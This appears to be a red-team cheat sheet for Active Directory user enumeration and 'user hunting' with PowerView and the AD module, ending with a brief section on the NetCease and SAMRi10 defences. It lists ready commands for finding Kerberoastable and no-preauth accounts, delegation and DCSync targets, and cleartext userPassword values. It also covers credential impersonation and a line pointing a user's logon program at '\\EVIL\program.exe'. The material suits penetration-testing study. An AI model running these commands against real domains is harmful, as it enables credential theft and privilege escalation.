Users
Get List of Users in Current Domain
# AD Module
Get-ADUser -Filter * -Properties *
Get-ADUser -Identity student1 -Properties *
Get-ADUser -Filter * -Properties * | Select Name
# PowerView
Get-NetUser
Get-NetUser -Username student1
Get-NetUser | Select cn
Get List of All Properties for Users in Current Domain
# AD Module
Get-ADUser -Filter * -Properties * | Select -First 1 | Get-Member -MemberType *Property | Select Name
Get-ADUser -Filter * -Properties * | Select name,@{expression={[datetime]::fromFileTime($_.pwdlastset)}}
Find All Users with an SPN
# PowerView
Get-DomainUser -SPN
Find All Service Accounts in "Domain Admins"
# PowerView
Get-DomainUser -SPN | ?{$_.memberof -match 'Domain Admins'}
Check for Users Who Don't Have Kerberos Preauthentication Set
# PowerView
Get-DomainUser -PreauthNotRequired
Get-DomainUser -UACFilter DONT_REQ_PREAUTH
Find Users with sidHistory Set
# PowerView
Get-DomainUser -LDAPFilter '(sidHistory=*)'
Find Any Users with Constrained Delegation Set
# PowerView
Get-DomainUser -TrustedToAuth
Find All Privileged Users that Aren't Marked as sensitive/not for Delegation
# PowerView
Get-DomainUser -AllowDelegation -AdminCount
Get List of All Properties for Users in Current Domain
# PowerView
Get-UserProperty
Get-UserProperty -Properties pwdlastset
Search for a Particular String in a User's Attributes
# AD Module
Get-ADUser -Filter 'Description -Like "*built*"' -Properties Description | Select name,Description
# PowerView
Find-UserField -SearchField Description -SearchTerm "built"
Get Actively Logged on Users on a Computer (needs Local Admin Rights on the target)
# PowerView
Get-NetLoggedOn -ComputerName dc.lab.local
Get Actively Logged on Users on a Computer
# PowerView
Get-LoggedOnLocal -ComputerName dc.lab.local
Get the Last Logged User on a Computer
# PowerView
Get-LastLoggedOn -ComputerName dc.lab.local
Get All Users with Passwords Changed > 1 Year ago
# PowerView
$Date = (Get-Date).AddYears(-1).ToFileTime()
Get-DomainUser -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset
Get All Enabled Users
# PowerView
Get-DomainUser -LDAPFilter "(!userAccountControl:1.2.840.113556.1.4.803:=2)" -Properties distinguishedname
Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname
Get All Disabled Users
# PowerView
Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=2)"
Get-DomainUser -UACFilter AccountDISABLE
Get All Users that Require Smart Card Authentication
# PowerView
Get-DomainUser -LDAPFilter "(useraccountcontrol:1.2.840.113556.1.4.803:=262144)"
Get-DomainUser -UACFilter SMARTCARD_REQUIRED
Get All Users that don't Require Smart Card Authentication
# PowerView
Get-DomainUser -LDAPFilter "(!useraccountcontrol:1.2.840.113556.1.4.803:=262144)" -Properties samaccountname
Get-DomainUser -UACFilter NOT_SMARTCARD_REQUIRED -Properties samaccountname
Use Multiple Identity Types for Any -Domain Function
# PowerView
'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff
Enumerate All Foreign Users in the Global Catalog, and Query the Specified Domain Localgroups for Their Memberships
# PowerView
# query the global catalog for foreign security principals with Domain-based SIDs, and extract out all distinguishednames
$ForeignUsers = Get-DomainObject -Properties objectsid,distinguishedname -SearchBase "GC://testlab.local" -LDAPFilter '(objectclass=foreignSecurityPrincipal)' | ? {$_.objectsid -match '^S-1-5-.*-[1-9]\d{2,}$'} | Select-Object -ExpandProperty distinguishedname
$Domains = @{}
$ForeignMemberships = ForEach($ForeignUser in $ForeignUsers) {
# extract the Domain the foreign User was added to
$ForeignUserDomain = $ForeignUser.SubString($ForeignUser.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
# check if we've already enumerated this Domain
if (-not $Domains[$ForeignUserDomain]) {
$Domains[$ForeignUserDomain] = $True
# enumerate all Domain local groups from the given Domain that have membership set with our foreignSecurityPrincipal set
$Filter = "(|(member=" + $($ForeignUsers -join ")(member=") + "))"
Get-DomainGroup -Domain $ForeignUserDomain -Scope DomainLocal -LDAPFilter $Filter -Properties distinguishedname,member
}
}
$ForeignMemberships | fl
If Running in -sta Mode, Impersonate Another Credential a la "runas /netonly"
# PowerView
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Invoke-UserImpersonation -Credential $Cred
# ... action
Invoke-RevertToSelf
Set the Specified Property for the given User Identity
# PowerView
Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose
Set the Owner of 'dfm' in the Current Domain to 'bufu'
# PowerView
Set-DomainObjectOwner -Identity dfm -OwnerIdentity bufu
Retrieve most Users Who Can Perform DC Replication for dev.testlab.local (i.e. DCsync)
# PowerView
Get-ObjectACL "DC=testlab,DC=local" -ResolveGUIDs | ? {
($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get')
}
Check if Any User Passwords Are Set
# PowerView
$FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl
User Hunting with PowerView
Find All Machines on the Current Domain where the Current User Has Local Admin Access
This function queries the DC of the current or provided Domain for a list of Computers (Get-NetComputer
) and then use multi-threaded Invoke-CheckLocalAdminAccess
on each machine.
Can also be done using WMI and PowerShell Remoting, see Find-WMILocalAdminAccess.ps1
and Find-PSRemotingLocalAdminAccess.ps1
.
Find-LocalAdminAccess -Verbose
Find Local Admins on All Machines
Needs administrator privs on non-dc machines.
This function queries the DC of the current or provided Domain for a list of Computers (Get-NetComputer
) and then use multi-threaded Get-NetLocalGroup
on each machine.
Invoke-EnumerateLocalAdmin -Verbose
Find Computers where a Domain Admin (or Specified User/group) Has Sessions
This function queries the DC of the current or provided Domain for members of the given group (Domain Admins by default) using Get-NetGroupMember
, gets a list of Computers (Get-NetComputer
) and list sessions and logged on Users (Get-NetSession
/ Get-NetLoggedon
) from each one.
Invoke-UserHunter
Invoke-UserHunter -GroupName "RDPUsers"
Confirm Admin Access
Invoke-UserHunter -CheckAccess
Find Computers where a Domain Admin is Logged-in
This option queries the DC of the current or provided Domain for members of the given group (Domain Admins by default) using Get-NetGroupMember
, gets a list only of high traffic servers (DC, File Servers and Distributed File servers) for less traffic generation and list sessions and logged on Users (Get-NetSession
/ Get-NetLoggedon
) from each machine.
Invoke-UserHunter -Stealth
Enumerate Servers that Allow Unconstrained Delegation and Show All Logged in Users
Find-DomainUserLocation
== old Invoke-UserHunter
Find-DomainUserLocation -ComputerUnconstrained -ShowAll
Hunt for Admin Users that Allow Delegation, Logged into Servers that Allow Unconstrained Delegation
Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation
Defending against User Hunting
NetCease
Script to change permissions on
NetSessionEnum
method by removing permissions forAuthenticated Users
groupFails many of the attacker's session enumeration and hence User hunting capabilities
.\NetCease.ps1
SAMRi10
From same author as NetCease
Hardens Windows 10 and Server 2016 against enumeration wihch uses SAMR protocol (like net.exe)
https://gallery.technet.microsoft.com/SAMRi10-Hardening-Remote-48d94b5b
Last updated